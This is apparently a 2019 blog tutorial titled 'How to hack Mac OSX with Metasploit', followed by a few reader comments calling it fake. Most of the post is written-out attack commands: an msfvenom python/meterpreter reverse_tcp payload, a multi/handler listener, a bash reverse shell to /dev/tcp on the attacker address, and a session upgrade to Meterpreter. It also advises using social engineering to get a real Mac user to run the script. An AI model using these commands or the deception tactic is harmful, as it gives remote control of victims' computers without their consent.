Wednesday, January 23, 2019

How to hack Mac OSX with Metasploit

When it comes to Metasploit a lot of people only target Windows machine and avoid Mac because they think it is not possible but that is not true. Today I am going to show you how to use Metasploit to generate a payload that can be deployed on a Mac OSX and instantly connect back to our machine through the reverse_tcp connection. 

Since Mac OS is shipped with Python we can use that to our advantage by creating a python script using the msfvenom inside Metasploit and embed the reverse_tcp payload inside the script.

1. Turn on your Kali and open a terminal.

2. Type in msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py

Now the pyterpreter.py should appear in your Home folder

pyterpreter script location

3. Open a new terminal and launch Metasploit by typing in msfconsole and press Enter. We need to set up a listener so when the script is running on the Mac computer it will instantly connect back to our attack machine.

msfconsole

4. In the new terminal, type in use multi/handler and press Enter

multi handler

5. Now we need to set the PAYLOAD, the LHOST which is the attacker IP address and the LPORT which is the port we want to listen on. You can do that by executing the following commands consecutively.

set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.26.130 
set LPORT 4444

set payload lhost lport

6. To start up the handler, enter this command exploit -j -z

The command exploit tells Metasploit to start exploiting the Mac machine. The -j flag tells Metasploit to run in the context of a job and -z simply means to not interact with the session once it becomes active. Running the exploit as a job allows it to run in the background and gives you control of the process running. Your screen should look similar to the one below.

exploit

7. Now send the pyterpreter.py file to the Mac machine and execute it. Note that since we are testing this you will have to open a terminal on the Mac machine and execute the command python pyterpreter.py in order to run the script but in a real scenario you would use some type of social engineering to convince the Mac user into executing the script via a terminal on their Mac. 

Once executed the script should immediately exit and run on the background of the Mac. You should now have a new session on your attack machine. Enter the command session -i 1 and press Enter. You should now be able to interact with the Mac machine.

To see a list of command available by typing in help and press Enter. This will show you a list of command you can execute or you can simply execute the shell command to drop into a shell and directly take control of the Mac. 


help with metasploit command

An alternative and quicker way to get the Meterpreter running on the Mac machine would be to start off with a reverse shell. Like I showed you in Step 2, all you have to do is set up a handler in Metasploit but here you would set the payload to "osx/x64/shell_reverse_tcp" instead. All the other steps in setting the handler would be exactly the same this way, you don't even need to generate a script with msfvenom to get this working. Simply run the handler, then run the following command on the Mac machine in a terminal:

bash -i >& /dev/tcp/192.168.26.130/4444 0>&1 2>&1

This command simply means "send an interactive bash session to IP address 192.168.26.130 on TCP port 4444."

Going back to Kali, you should see a new session opened in Metasploit. Don't open the session because if you do, it will simply terminate once you are done. Instead, upgrade it to a meterpreter by running the following command in Metasploit (assuming your new session ID is 1):

sessions -u 1

Now you should have a new Meterpreter session open and you should be able to interact with the Mac.

3 comments:

  1. If I had «[...] to convince the Mac user into executing the script via a terminal on their Mac [...]» I surely have no need to launch metasploit, I would just connect to the remote daemon with whatever tool I choose. This article is a fake

    ReplyDelete
    Replies
    1. yeah but the goal of this is to show that it can be done with Metasploit if the user chooses to use Metasploit as a hacking tool. I am sure there are other ways to hack a Mac.

      Delete
  2. this article is fake. I would «convince the Mac user into executing [...]» whatever tool I want! No need to use metasploit.

    ReplyDelete